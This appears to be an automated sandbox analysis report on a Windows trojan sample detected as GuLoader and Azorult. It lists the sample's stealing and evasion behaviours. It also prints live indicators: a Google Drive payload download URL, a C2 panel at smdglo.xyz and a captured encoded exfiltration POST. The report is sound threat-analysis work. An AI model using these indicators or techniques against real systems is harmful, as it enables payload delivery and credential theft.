Windows Analysis Report X4lLneI8ZK.exe

Overview

General Information

Sample Name:	X4lLneI8ZK.exe
Analysis ID:	479789
MD5:	4103a2b04ede0d36e5079f6799cdfa14
SHA1:	23b477810f258963e62458ed02e82c58c8c00adc
SHA256:	b923011216d37106f2f497f12097ecd3412caca89edee1a49e8090b94344a310
Tags:	32exetrojan
Infos:
Most interesting Screenshot:

Detection

GuLoader Azorult

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Azorult

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

GuLoader behavior detected

Yara detected GuLoader

Hides threads from debuggers

Tries to steal Crypto Currency Wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect Any.run

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Performs DNS queries to domains with low reputation

Self deletion via cmd delete

Tries to harvest and steal Bitcoin Wallet information

Tries to detect virtualization through RDTSC time measurements

C2 URLs / IPs found in malware configuration

Tries to steal Mail credentials (via file access)

Tries to steal Instant Messenger accounts or passwords

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

Found inlined nop instructions (likely shell or obfuscated code)

PE file does not import any functions

Sample file is different than original file name gathered from version info

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Binary contains a suspicious time stamp

PE / OLE file has an invalid certificate

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000000.00000002.615028324.0000000002300000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1z63Cb8jeqd2}"}

Multi AV Scanner detection for submitted file

Source: X4lLneI8ZK.exe	Virustotal: Detection: 38%			Perma Link
Source: X4lLneI8ZK.exe	ReversingLabs: Detection: 35%

Compliance:

Uses 32bit PE files

Source: X4lLneI8ZK.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown	HTTPS traffic detected: 142.251.36.14:443 -> 192.168.2.6:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.36.1:443 -> 192.168.2.6:49819 version: TLS 1.2

Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914392876.000000001FF50000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.17.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914669159.000000001FF88000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.17.dr
Source:	Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: X4lLneI8ZK.exe, 00000011.00000003.910902953.000000001F5B0000.00000004.00000001.sdmp, mozglue.dll.17.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.17.dr
Source:	Binary string: ucrtbase.pdb source: X4lLneI8ZK.exe, ucrtbase.dll.17.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.17.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, freebl3.dll.17.dr
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.17.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.17.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.17.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914669159.000000001FF88000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.17.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.17.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914024671.000000001FF2C000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.17.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.909646224.000000001F55C000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.17.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, vcruntime140.dll.17.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914184884.000000001FF3C000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.17.dr
Source:	Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: X4lLneI8ZK.exe, 00000011.00000003.910902953.000000001F5B0000.00000004.00000001.sdmp, mozglue.dll.17.dr
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.17.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.17.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, freebl3.dll.17.dr
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.17.dr
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.17.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.910332025.000000001F558000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.17.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914184884.000000001FF3C000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.17.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr
Source:	Binary string: msvcp140.i386.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, msvcp140.dll.17.dr
Source:	Binary string: ucrtbase.pdbUGP source: X4lLneI8ZK.exe, 00000011.00000003.912538712.000000001E7AC000.00000004.00000001.sdmp, ucrtbase.dll.17.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.17.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.17.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nssdbm3.dll.17.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.17.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.909646224.000000001F55C000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.17.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.909154010.000000001F568000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.17.dr
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.17.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914024671.000000001FF2C000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.17.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.17.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914392876.000000001FF50000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.17.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.17.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.17.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914392876.000000001FF50000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.17.dr
Source:	Binary string: vcruntime140.i386.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, vcruntime140.dll.17.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.17.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.17.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nssdbm3.dll.17.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914024671.000000001FF2C000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.17.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, msvcp140.dll.17.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.17.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.17.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.17.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.17.dr
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.17.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914392876.000000001FF50000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.17.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.17.dr

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 4x nop then mov ecx, ecx		0_2_00401B77
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 4x nop then mov ecx, ecx		0_2_00402D9F

Networking:

Performs DNS queries to domains with low reputation

Source:

DNS query: smdglo.xyz

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&id=1z63Cb8jeqd2}

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1z63Cb8jeqd2y20-L4yBkWSNGOI62mzhE HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/fkchcv79jnjfnc5h291r5b1jhco7oja2/1631103525000/09352478152086662440/*/1z63Cb8jeqd2y20-L4yBkWSNGOI62mzhE?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-b4-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /panel/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: smdglo.xyzContent-Length: 107Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 ff 4c 2f fb 3a 2f fb 39 2f fb 3c 2f fb 3d 2f fb 3a 2f fa 49 2f fb 34 2f fb 34 4b ed 3e 3c ed 3e 33 8c 28 39 f9 48 2f fa 49 4b 8c 4b 2f fb 35 2f fb 3b 2f fb 3c 2f fb 3d 4c ed 3e 3b Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9L/:/9/</=/:/I/4/4K><>3(9H/IKK/5/;/</=L>;
Source: global traffic	HTTP traffic detected: POST /panel/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: smdglo.xyzContent-Length: 89809Cache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818

Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: X4lLneI8ZK.exe	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: X4lLneI8ZK.exe	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: X4lLneI8ZK.exe	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: X4lLneI8ZK.exe	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: X4lLneI8ZK.exe	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: X4lLneI8ZK.exe, 00000011.00000002.933642572.000000001E420000.00000004.00000001.sdmp	String found in binary or memory: http://smdglo.xyz/panel/index.php
Source: X4lLneI8ZK.exe, 00000011.00000002.933642572.000000001E420000.00000004.00000001.sdmp	String found in binary or memory: http://smdglo.xyz/panel/index.phpB
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: mozglue.dll.17.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr	String found in binary or memory: http://www.mozilla.com0
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/Fhttps://www.google.com/chrome/Ap
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-chP
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
Source: 155799843460763056844440.tmp.17.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp	String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp	String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=
Source: 155799843460763056844440.tmp.17.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.p
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php:http://www.msn.com/de-ch/Zhttps://contextual.media.net/me
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.phpd=
Source: 155799843460763056844440.tmp.17.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 155799843460763056844440.tmp.17.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 155799843460763056844440.tmp.17.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 155799843460763056844440.tmp.17.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 155799843460763056844440.tmp.17.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: X4lLneI8ZK.exe	String found in binary or memory: https://www.globalsign.com/repository/0
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.htmlP
Source: 155799843460763056844440.tmp.17.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

HTTP traffic detected: POST /panel/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: smdglo.xyzContent-Length: 107Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 ff 4c 2f fb 3a 2f fb 39 2f fb 3c 2f fb 3d 2f fb 3a 2f fa 49 2f fb 34 2f fb 34 4b ed 3e 3c ed 3e 33 8c 28 39 f9 48 2f fa 49 4b 8c 4b 2f fb 35 2f fb 3b 2f fb 3c 2f fb 3d 4c ed 3e 3b Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9L/:/9/</=/:/I/4/4K><>3(9H/IKK/5/;/</=L>;

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1z63Cb8jeqd2y20-L4yBkWSNGOI62mzhE HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/fkchcv79jnjfnc5h291r5b1jhco7oja2/1631103525000/09352478152086662440/*/1z63Cb8jeqd2y20-L4yBkWSNGOI62mzhE?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-b4-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 142.251.36.14:443 -> 192.168.2.6:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.36.1:443 -> 192.168.2.6:49819 version: TLS 1.2

System Summary:

Malicious sample detected (through community Yara rule)

Source: 17.2.X4lLneI8ZK.exe.1fb9a0b0.4.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 17.2.X4lLneI8ZK.exe.1fc277ee.6.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 17.2.X4lLneI8ZK.exe.1fbbc09d.5.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer Payload Author: kevoreilly

Uses 32bit PE files

Source: X4lLneI8ZK.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Yara signature match

Source: 17.2.X4lLneI8ZK.exe.1fb9a0b0.4.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 17.2.X4lLneI8ZK.exe.1fc277ee.6.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 17.2.X4lLneI8ZK.exe.1fbbc09d.5.raw.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload

Detected potential crypto function

Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_00401B77	0_2_00401B77
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0040301D	0_2_0040301D
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_00402E23	0_2_00402E23
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_00402EA4	0_2_00402EA4
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_004030A6	0_2_004030A6
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0040154E	0_2_0040154E
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0040135F	0_2_0040135F
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_00402F2B	0_2_00402F2B
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0040312C	0_2_0040312C
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_0040159B	0_2_0040159B
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe	Code function: 0_2_00402D9F	0_2_00402D9F
